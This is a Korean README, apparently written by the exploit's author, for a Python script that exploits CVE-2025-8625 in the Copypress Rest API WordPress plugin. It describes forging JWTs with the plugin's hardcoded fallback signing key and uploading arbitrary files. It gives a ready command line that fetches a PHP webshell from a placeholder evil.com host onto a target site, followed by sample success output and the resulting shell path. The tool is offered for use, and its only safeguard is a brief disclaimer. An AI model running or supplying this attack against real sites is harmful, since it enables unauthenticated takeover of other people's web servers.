
Copypress Rest API 1.1 - 1.2 - 구성 가능한 JWT 시크릿 및 파일 형식 검증 누락으로 인한 인증되지 않은 원격 코드 실행
Copypress Rest API 1.1 - 1.2 - 구성 가능한 JWT 시크릿 및 파일 형식 검증 누락으로 인한 인증되지 않은 원격 코드 실행
WordPress용 Copypress Rest API 플러그인(버전 1.1~1.2)은 copyreap_handle_image() 함수를 통해 원격 코드 실행(RCE) 취약점에 노출됩니다.
이 플러그인은 시크릿이 설정되지 않았을 때 하드코딩된 JWT 서명 키를 사용하고 파일 형식을 검증하지 않으므로, 인증되지 않은 공격자가 토큰을 위조하고 이미지 처리 엔드포인트를 통해 임의의 파일(예: PHP 셸)을 업로드할 수 있습니다.
스크립트 이름: CVE-2025-8625.py
이 Python 스크립트는 취약점 악용을 자동화하여 유효한 JWT를 생성하고 조작된 요청을 전송하며 악성 파일(웹셸)을 취약한 WordPress 사이트에 업로드할 수 있게 해줍니다.
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url: 대상 WordPress 사이트 URL-shell / --shell: 웹셸 또는 악성 PHP 파일의 직접 링크출력 예시:
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
셸이 성공적으로 업로드되었습니다! 🎉
셸 경로 예시:
https://target.com/wp-content/uploads/2025/10/shell.php
이 도구는 교육 및 승인된 침투 테스트 목적으로만 사용해야 합니다.
명시적인 허가 없이 대상을 공격하는 것은 불법입니다.
제작: Nxploited (Khaled Alenazi)